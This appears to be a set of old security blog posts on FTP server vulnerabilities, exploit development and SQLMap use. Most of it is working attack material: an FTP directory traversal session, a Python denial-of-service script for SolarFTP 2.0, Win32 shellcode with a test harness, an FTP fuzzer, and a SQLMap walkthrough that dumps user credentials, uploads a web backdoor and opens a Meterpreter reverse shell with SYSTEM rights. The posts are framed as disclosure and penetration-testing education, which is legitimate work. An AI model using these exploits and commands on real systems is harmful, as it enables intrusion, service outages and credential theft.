Remove Comments from Configuration

Sometimes when you want to config something, it contains the comments from the developer which will help us to figured out which options of arguments will be used. But if you are already familiar with the configuration, comments are so annoying, so here is how to eliminate them (using apache2.conf as example):

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' /etc/apache2/apache2.conf | more

or write it to a file:

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' /etc/apache2/apache2.conf > /etc/apache2/apache2.conf.nocomments

Use it with caution, always review it. You’ve been warned!

QuickShare File Server 1.2.1 FTP Directory Traversal Vulnerability

QuickShare File Server is prone to a FTP directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to modify files outside the destination directory and possibly gain access to the system.

Software Description

QuickShare File Server is a easy to use file sharing software helps you build your own file server. Users could access your server through web browsers or FTP client softwares (In most case, they need not to install any extra softwares). Users could send or receive large files to or from you. You could create account and set password to protect your files.

Exploit Information

It’s a FTP directory traversal. User without prior permission can get a file outside the specified directory (e.g. get a file from %systemroot%). This vulnerability can be exploited by anonymous or authenticated users.

POC

Below is the proof of concept, authenticated user logged in to the quickshare ftp server from Ubuntu Linux. The highlighted lines contain commands I type to the Quickshare ftp server.

modpr0be@digital-echidna:~$ ftp 10.5.5.27
Connected to 10.5.5.27.
220 quickshare ftpd ready.
Name (10.5.5.27:modpr0be): ftpuser
331 User name okay, need password.
Password: *******
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../../../../../../../../boot.ini boot.ini
local: boot.ini remote: ../../../../../../../../boot.ini
200 PORT command successful. Consider using PASV.
150 Opening BINARY connection.
226 File send OK.
211 bytes received in 0.00 secs (127.0 kB/s)
ftp> quit
221 Goodbye.
modpr0be@digital-echidna:~$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
modpr0be@digital-echidna:~$

Fix and Update

QuickShare Team fix this vulnerability and update it to version 1.2.2, see here.

FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit

A vulnerability has been discovered in FTPGetter, which can be exploited by malicious people to compromise a user’s system.

The issue is likely due to insufficient bounds checking and presents itself when the affected FTP client makes a connection to a malicious server that is running PASV mode. The PASV command is issued to tell the server that the client wishes to transfer files in passive mode. FTP servers that support passive mode will respond to such a request with an IP address and port number.

Successful exploitation allows execution of arbitrary code, but requires that the user is tricked into connecting to a malicious FTP server.

Software Description

Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. Schedule and automate file transfers with a centralized console. Let your computer move or synchronize information securely between home and office automatically according to the schedule!

Exploit Information

There was an error when sending a response to the PASV command. Unfortunately, these errors lead to buffer overflows. This exploit is unstable. It should only be used as a POC. I tried several times on various systems, the buffer sometimes changed.

Some Conditions to PoC

This POC is using “the most selling feature” Automated FTP Request. So this POC, I use Auto Download with / as the Source Files. Scheduler Settings also set to Repetitive. Make sure to run the program first before this POC.

It’s a part of “Death of an FTP Client” 🙂
For more information, look at here:
http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/

Proof of Concept

http://www.exploit-db.com/exploits/16101/

Fix and Update

Do not connect to untrusted FTP server. Fix or update not available yet, we will update this post if the vendor fix the bug.

UPDATE: FTPGetter team has released new version of FTPGetter, more info on their website

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability

SolarFTP Server 2.0 is prone to a denial of service condition. It fails to properly sanitize user-supplied input resulting in a denial of service. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’, and ‘NLST’ command, a remote attacker can potentially disable the FTP service.

Software Description

Solar FTP Server is a handy and easy to use personal FTP server with features like virtual directories, simple and intuitive user interface, real-time activity monitoring and management.

Testing and Fuzzing

Using Very Simple FTP Fuzzer, we test the FTP server with various commands. The first command that we sent was APPE (append). The Windows exception handler pop out. That was verify that the server may be vulnerable to some commands.

Unfortunately, the junk that we sent did not overwrite the SEH nor the EIP. It just end in Denial of Service. In conclusion, there are 4 commands which make the server crash, APPE, NLST, PUT, and GET.

Proof of Concept

Here are the python script for the PoC.

#!/usr/bin/python

# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
# Date: 12/17/2010
# Author: modpr0be
# Software Link: http://www.solarftp.com/files/solarftps-setup.exe
# Vulnerable version: 2.0
# Tested on: Windows XP SP2, Windows XP SP3
# CVE : N/A
#
# ======================================================================
#        ___       _ __        __            __    _     __
#   ____/ (_)___ _(_) /_____ _/ / ___  _____/ /_  (_)___/ /___  ____ _
#  / __  / / __ `/ / __/ __ `/ / / _ / ___/ __ / / __  / __ / __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /  __/ /__/ / / / / /_/ / / / / /_/ /
# __,_/_/__, /_/__/__,_/_/  ___/___/_/ /_/_/__,_/_/ /_/__,_/
#        /____/                          http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# 	say hello to all digital-echidna org crew:
# 		otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#	special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team
#
#### Software description:
# Solar FTP Server is a handy and easy to use personal FTP server with
# features like virtual directories, simple and intuitive user interface,
# real-time activity monitoring and management.
#
#### Exploit information:
# SolarFTP 2.0 will suddenly stop (crash) while these commands were sent:
# APPE, GET, PUT, NLST, and MDTM
# Sending USER with junk also crashing the Admin Configuration but not the service.
# Stack contains our junk in random. Both EIP and SEH were not overwritten.
#
#### Other information:
# 12/10/2010 - vendor contacted
# 12/17/2010 - no response, advisory released

import socket, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "x41" * 80000

def banner():
	print "nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability."
	print "By: modpr0be (modpr0be[at]digital-echidna[dot]org)n"

if len(sys.argv)!=4:
        banner()
        print "Usage: %s
n" %sys.argv[0]
        sys.exit(0)

try:
	s.connect((sys.argv[1], 21))
except:
	print "Can't connect to server!n"
	sys.exit(0)

s.recv(1024)
s.send('USER '+sys.argv[2]+'rn')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'rn')
s.recv(1024)
s.send('APPE '+junk+'rn')
s.recv(1024)
s.close()

Or you can download at Exploit-DB from the link below:
http://www.exploit-db.com/exploits/15750/

Fix and Update

Download the latest version from SolarFTP website.

53 bytes – Windows XP SP3 (en) notepad.exe win32 Shellcode

Finally, my first win32 shellcode..

This will execute notepad.exe when loaded. Run on Windows XP SP3 English.

/*
(o_Ov) say hello to all digital-echidna org crew:
otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix

special thx to offsec, exploit-db, and corelan team
*/

/*shellcodetest.c*/

char code[] = "\x31\xc0\x50\xb8\x72\x75\x11\x11"
"\x2d\x11\x11\x11\x11\x50\x68\x6f"
"\x74\x65\x70\x68\x2f\x63\x20\x6e"
"\x68\x65\x78\x65\x20\x68\x63\x6d"
"\x64\x2e\x89\xe3\x50\x53\xbb"
"\x0d\x25\x86\x7c"			/*Kernel32.dll.WinExec*/
"\xff\xd3\x50\xbb"
"\x12\xcb\x81\x7c"			/*Kernel32.dll.ExitProcess*/
"\xff\xd3";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}

0day Linux Escalation Privilege Exploit Collection (Oct-Nov 2010)

I have created a script that contains of local privilege escalation exploits that was published by Tavis Ormandy via Exploit-DB.com between October – November 2010.

Take a look at here 201011-0day-linux-exploit

*Update 1: I rename the file and make the script more comfort.
*Update 2: Moved to Github

Please note that I am not responsible for the misuse of this tool. I just collect them into one script. For all users who download this tool should have their own responsibility on it.

Very Simple FTP Fuzzer

Written in Python, i try to make a simple fuzzer for FTP server. This script will try to fuzz the commands like APPE, USER, LIST, CWD, etc..you can find all commands here 😉

This script is simply a modified version from muts simple ftp fuzzer during offsec training 😀

Hope you like it 🙂

#!/usr/bin/env python

########################################################
# Very Simple FTP Fuzzer                               #
# this is a modified version from simple ftp fuzzer    #
# coded by muts                                        #
#                                                      #
# thx: oebaj, offsec, xecureit, jasakom, 0x70y #
########################################################

import sys, socket
from optparse import OptionParser

usage = "./%prog -t [target] -p [port] -u [ftp user] -P [ftp passwd] -c [command to fuzz]"
usage += "nContoh: ./%prog -t 192.168.10.10 -p 21 -u ftp -P ftp -c APPE"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string", action="store", dest="port",
		help="Port to connect")
parser.add_option("-t", type="string", action="store", dest="target",
		help="The target server")
parser.add_option("-u", type="string", action="store", dest="username",
		help="FTP username")
parser.add_option("-P", type="string", action="store", dest="password",
		help="FTP password")
parser.add_option("-c", type="string", action="store", dest="fuzz",
		help="Command to Fuzz ")
(options, args) = parser.parse_args()

def banner():
	print "ntt|------------------------------------------------------------------|"
	print "tt|	  	      Very Simple FTP Fuzzer			   |"
	print "tt|------------------------[ by modpr0be ]---------------------------|"
	print "tt|-----------------[ modpr0be[at]postnix[dot]org ]------------------|"
	print "tt|-------------------[ originally coded by muts ]-------------------|"
	print "tt|------------------------------------------------------------------|n"

if len(sys.argv) < 4:
	banner()
	parser.print_help()
	sys.exit(1)

def cmd():
	for string in buffer:
		print "Fuzzing command " + (options.fuzz) + ": " +str(len(string))
		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		connect=s.connect((options.target, 21))
		s.recv(1024)
		s.send('USER '+(options.username)+'rn')
		s.recv(1024)
		s.send('PASS '+(options.password)+'rn')
		s.recv(1024)
		s.send((options.fuzz) + ' ' + string + 'rn')
		s.recv(1024)
		s.send('byern')
		s.close()

banner()
buffer = ["A"]
counter = 100
while len(buffer) <=100:
	buffer.append("A" * counter)
	counter = counter + 100
cmd()

#20109modpr0be

How to: SQLMap (dump and destroy)

SQLMap is the tool to automate SQL Injection vulnerability exploitation. This tool is very popular to exploit the SQL Injection vulnerability. While most of web hacker enthusiast knew about this tool to gather information and retrieves the tables information, i try to share this information about the powerful of SQLMap rather than just as “a database dumper tool”.

I will separate this in 3 section, as a fingerprinter (we already knew this), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.

Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818"

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 22:26:52

[22:26:52] [INFO] using '/pentest/database/sqlmap/output/192.168.1.102/session' as session file
[22:26:52] [INFO] resuming match ratio '0.972' from session file
[22:26:52] [INFO] resuming injection point 'GET' from session file
[22:26:52] [INFO] resuming injection parameter 'id' from session file
[22:26:52] [INFO] resuming injection type 'numeric' from session file
[22:26:52] [INFO] resuming 0 number of parenthesis from session file
[22:26:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:26:52] [INFO] resuming remote absolute path of temporary files directory 'C:/WINDOWS/Temp' from session file
[22:26:52] [INFO] testing connection to the target url
[22:26:52] [INFO] testing for parenthesis on injectable parameter
[22:26:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5


[*] shutting down at: 22:26:52

Yes, we knew this at all. Dump the database engine, the version, and the operating system information.

Enumerate Database

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --dbs

---------------------------------------------------------------------

[22:28:41] [INFO] fetching database names
[22:28:41] [INFO] fetching number of databases
[22:28:41] [INFO] retrieved: 6
[22:28:41] [INFO] retrieved: information_schema
[22:28:44] [INFO] retrieved: cdcol
[22:28:45] [INFO] retrieved: mysql
[22:28:46] [INFO] retrieved: phpmyadmin
[22:28:47] [INFO] retrieved: test
[22:28:48] [INFO] retrieved: webappdb
available databases [6]:
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] webappdb

Dump the database, yes..SQLMap always do the great stuff!

Enumerate tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" -D webappdb --tables

[22:32:32] [INFO] fetching tables for database 'webappdb'
[22:32:32] [INFO] fetching number of tables for database 'webappdb'
[22:32:32] [INFO] retrieved: 2
[22:32:33] [INFO] retrieved: guestbook
[22:32:34] [INFO] retrieved: users
Database: webappdb
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Dump the tables

[22:36:54] [INFO] fetching columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 4
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': id
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': name
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': country
[22:36:54] [INFO] fetching entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 1
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': admin
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 123456
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 2
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': secret
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': SG
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup12
Database: webappdb
Table: users
[3 entries]
+---------+----+--------+----------+
| country | id | name   | password |
+---------+----+--------+----------+
| ID      | 1  | admin  | 123456   |
| ID      | 2  | secret | password |
| SG      | 3  | backup | backup12 |
+---------+----+--------+----------+

[22:36:54] [INFO] Table 'webappdb.users' dumped to CSV file '/pentest/database/sqlmap/output/192.168.1.102/dump/webappdb/users.csv'
[22:36:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.102'

[*] shutting down at: 22:36:54

SQLMap do a great job so far 🙂 Next, take over the system!!

Remote Command Execution

root@bt:/pentest/database/sqlmap#./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --os-shell

[22:51:25] [INFO] trying to upload the uploader agent

which web application language does the web server support?


[1] ASP (default)
[2] PHP
[3] JSP
>2
[22:51:27] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[22:51:28] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[22:51:28] [INFO] the uploader agent has been successfully uploaded on 'C:/xampp/htdocs/' ('http://192.168.1.102:80/tmpuduwd.php')
[22:51:28] [INFO] the backdoor has probably been successfully uploaded on 'C:/xampp/htdocs/', go with your browser to 'http://192.168.1.102:80//tmpbpjbr.php' and enjoy it!
[22:51:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
>2 ipconfig
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:
---
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.1.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
---
os-shell>

The Metasploit’s Meterpreter over SQL Injection

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --msf-path=/opt/metasploit3/msf3 --os-pwn

This time, SQLMap will upload an php file contain shell_exec in order to execute arbitrary command to the remote system via php. After uploaded, SQLMap will trigger the msfpayload (Metasploit Payload) to build “portable executable” meterpreter backdoor. It will be encoded and uploaded via php shell.

When uploaded, SQLMap will trigger “Metasploit listener” called Multi/handler and waiting for the “portable exe backdoor” to be executed. After it executed, the meterpreter shell will come up 🙂
I will skip some information here, because it is too long to be dropped here.
—-the process before this line was creating the php shell and upload to document root—–
[22:57:05] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>1


which is the local address? [192.168.1.100]
which local port number do you want to use? [31503]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> 11
[22:57:46] [INFO] creation in progress ................ done
[22:58:03] [INFO] compression in progress . done
[22:58:04] [INFO] uploading payload stager to 'C:/xampp/htdocs/tmpmtonj.exe'
[22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait..
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.100:31503
[*] Starting the payload handler...
[22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
[*] Sending stage (748544 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.100:31503 -> 192.168.1.102:2561)
meterpreter> Loading extension espia...success.
meterpreter> Loading extension incognito...success.
meterpreter> Loading extension priv...success.
meterpreter> Loading extension sniffer...success.
meterpreter> Computer: XP_FDCC
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter> Server username: NT AUTHORITYSYSTEM
meterpreter>

meterpreter> shell
Process 3128 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:>



OS Pwned!